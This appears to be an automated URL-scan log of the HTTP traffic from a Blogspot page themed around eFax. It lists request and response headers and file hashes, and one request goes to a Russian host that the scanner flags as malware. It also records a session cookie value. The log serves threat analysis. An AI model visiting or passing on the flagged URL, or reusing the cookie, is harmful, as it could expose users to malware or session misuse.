Sha256: ca9848e6006cfec8f9ffa29433ade8152204bdb95579200831c6dc0f53dff70b
                                        
                                            GET /img/icon18_wrench_allbkg.png HTTP/1.1 
Host: resources.blogblog.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://tektekdunk.blogspot.no/2013/03/efax-corporate.html

                                         
                                         172.217.22.169
HTTP/1.1 200 OK
Content-Type: image/png
                                        
Accept-Ranges: bytes
Content-Length: 475
Date: Sat, 09 Dec 2017 18:57:05 GMT
Expires: Sat, 16 Dec 2017 18:57:05 GMT
Last-Modified: Fri, 08 Dec 2017 19:28:35 GMT
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=604800
Age: 179142
Alt-Svc: hq=":443"; ma=2592000; quic=51303431; quic=51303339; quic=51303338; quic=51303337; quic=51303335,quic=":443"; ma=2592000; v="41,39,38,37,35"


--- Additional Info ---
Magic:  PNG image, 18 x 18, 8-bit colormap, non-interlaced
Size:   475
Md5:    f617effe6d96c15acfea8b2e8aae551f
Sha1:   6d676af11ad2e84b620cce4d5992b657cb2d8ab6
Sha256: d172d750493be64a7ed84dec1dd2a0d787ba42f78bc694b0858f152c52b6620b
                                        
                                            GET /feeds/posts/default?orderby=published&alt=json-in-script&callback=rp HTTP/1.1 
Host: blanksfile.blogspot.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://tektekdunk.blogspot.no/2013/03/efax-corporate.html

                                         
                                         172.217.22.161
HTTP/1.1 200 OK
Content-Type: text/javascript; charset=UTF-8
                                        
Content-Encoding: gzip
Etag: W/"ec01821d60546f7dec427cba2fafbd7f0e1f18c8a6c989a813aa8e3fcfda1363"
Date: Mon, 11 Dec 2017 20:42:47 GMT
Server: blogger-renderd
Cache-Control: public, must-revalidate, proxy-revalidate, max-age=1
Vary: Accept-Encoding
Expires: Mon, 11 Dec 2017 20:42:48 GMT
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Last-Modified: Fri, 03 Oct 2014 06:09:32 GMT
Content-Length: 14012
X-Frame-Options: SAMEORIGIN


--- Additional Info ---
Magic:  gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT)
Size:   14012
Md5:    df9566979ee69e990b8ad2d82eecf6a4
Sha1:   d5dacde727d6f8244aac3422fc3d6707bfd5a2b3
Sha256: a3c64704ee632bac72deb4799043789b145137cdc8c929ef135e6c8737e7f479
GET /_/scs/apps-static/_/js/k=oz.gapi.no.1Fi7CQudkS4.O/m=plusone/rt=j/sv=1/d=1/ed=1/am=AQ/rs=AGLTcCOr5ej3ztkUZk0VbY6BF5li0lHi5g/cb=gapi.loaded_0 HTTP/1.1
Host: apis.google.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://tektekdunk.blogspot.no/2013/03/efax-corporate.html
Cookie: NID=119=okMAMXITwUeoVMUnyDvoWK4M8Ux77yzEn8sE00KBAHltyUxDgb6tjWlXAya7G9toN2SW51IP3J5_XtY7Q48K8NLilI3i1AyfEORQNnHsXxFYvnSXNq0TE0LR4iTiXgPv

216.58.211.142
HTTP/1.1 200 OK
Content-Type: text/javascript; charset=UTF-8
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 46602
Date: Sun, 10 Dec 2017 18:45:55 GMT
Expires: Mon, 10 Dec 2018 18:45:55 GMT
Last-Modified: Thu, 07 Dec 2017 02:15:56 GMT
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Cache-Control: public, immutable, max-age=31536000
Age: 93412
Alt-Svc: hq=":443"; ma=2592000; quic=51303431; quic=51303339; quic=51303338; quic=51303337; quic=51303335,quic=":443"; ma=2592000; v="41,39,38,37,35"


--- Additional Info ---
Magic:  gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT)
Size:   46602
Md5:    c6782206c5846062b5f30cb68af925a5
Sha1:   97e0a0d7ec3eebdd2ce7966fa38e3c0ec1f02b1f
Sha256: 19eb077cffa1af02bf0b65ca30f7db9fa1a885361f064a8652cfe369be5966f3
GET /favicon.ico HTTP/1.1
Host: tektekdunk.blogspot.no
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive

172.217.22.161
HTTP/1.1 200 OK
Content-Type: image/x-icon
Expires: Mon, 11 Dec 2017 20:42:47 GMT
Date: Mon, 11 Dec 2017 20:42:47 GMT
Cache-Control: private, max-age=86400
Last-Modified: Fri, 03 Oct 2014 07:32:15 GMT
Etag: W/"03a63c64f71485c82a2f64efbd0a532eda39d83c9bcec59e8f439a250f07389a"
Content-Encoding: gzip
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Content-Length: 412
Server: GSE


--- Additional Info ---
Magic:  gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT)
Size:   412
Md5:    23e5eb1119a7f4d2ab629ccd77a5f84b
Sha1:   f7a5a792e41005ba918551e4416c4bf639ec80ec
Sha256: a0c8d4831f453c316840a502432719f7f7d833bea4a9b59f548e4a1bc2bf0c8a
GET /pagead/js/google_top_exp.js HTTP/1.1
Host: pagead2.googlesyndication.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://tektekdunk.blogspot.no/2013/03/efax-corporate.html

216.58.209.130
HTTP/1.1 200 OK
Content-Type: text/javascript; charset=UTF-8
P3P: policyref="http://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA IVD OTP OUR OTR IND OTC"
Timing-Allow-Origin: *
Date: Wed, 06 Dec 2017 11:10:17 GMT
Expires: Wed, 20 Dec 2017 11:10:17 GMT
Etag: 13036835877489095579
X-Content-Type-Options: nosniff
Content-Disposition: attachment; filename="f.txt"
Content-Encoding: gzip
Server: cafe
Content-Length: 67
X-XSS-Protection: 1; mode=block
Age: 466350
Cache-Control: public, max-age=1209600


--- Additional Info ---
Magic:  gzip compressed data, max compression
Size:   67
Md5:    9bbc3ca32ec951a484589ce0e6b4db73
Sha1:   753d6f6183b33b2dee5dde2208fca91c17f5bb13
Sha256: b8f16a16d2a7ea39a9cc079fdbe3af7d31393d62a853668bdd549e0a0311cb3c
GET /f/248/528/15m/go.evoice.com/CBD/500/default/default-en-web-logo.gif HTTP/1.1
Host: a248.g.akamai.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://tektekdunk.blogspot.no/2013/03/efax-corporate.html

195.159.219.10
HTTP/1.0 200 OK
Content-Type: image/gif
Server: Apache
Last-Modified: Thu, 08 Aug 2013 17:48:55 GMT
Etag: "360cad-d61-4e37345a4759d"
Accept-Ranges: bytes
Content-Length: 3425
P3P: CP='NOI DSP COR NID BUS'
X-Robots-Tag: noindex
X-Frame-Options: sameorigin
Cneonction: close
Date: Mon, 11 Dec 2017 20:42:47 GMT
Connection: keep-alive
x-v1arl-whitelisted: true


--- Additional Info ---
Magic:  GIF image data, version 89a, 186 x 63
Size:   3425
Md5:    c4d50a24f615b7c1142bf0ea47e909b8
Sha1:   fab319dd206d07f412319d3359484a7e1adbb346
Sha256: 9d33080d445ccfd424ce7452da13af2a732142ffe6aaeb96d9880689aae884c2
GET /forum/links/column.php HTTP/1.1
Host: forumla.ru:8080
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://tektekdunk.blogspot.no/2013/03/efax-corporate.html

0.0.0.0


--- Additional Info ---

Alerts:
  urlquery:
    - Detects suspicious URL pattern
  Blacklists:
    - fortinet: Malware
GET /_/scs/apps-static/_/js/k=oz.gapi.no.1Fi7CQudkS4.O/m=gapi_iframes,gapi_iframes_style_bubble/exm=plusone/rt=j/sv=1/d=1/ed=1/am=AQ/rs=AGLTcCOr5ej3ztkUZk0VbY6BF5li0lHi5g/cb=gapi.loaded_1 HTTP/1.1
Host: apis.google.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://tektekdunk.blogspot.no/2013/03/efax-corporate.html
Cookie: NID=119=okMAMXITwUeoVMUnyDvoWK4M8Ux77yzEn8sE00KBAHltyUxDgb6tjWlXAya7G9toN2SW51IP3J5_XtY7Q48K8NLilI3i1AyfEORQNnHsXxFYvnSXNq0TE0LR4iTiXgPv

0.0.0.0


--- Additional Info ---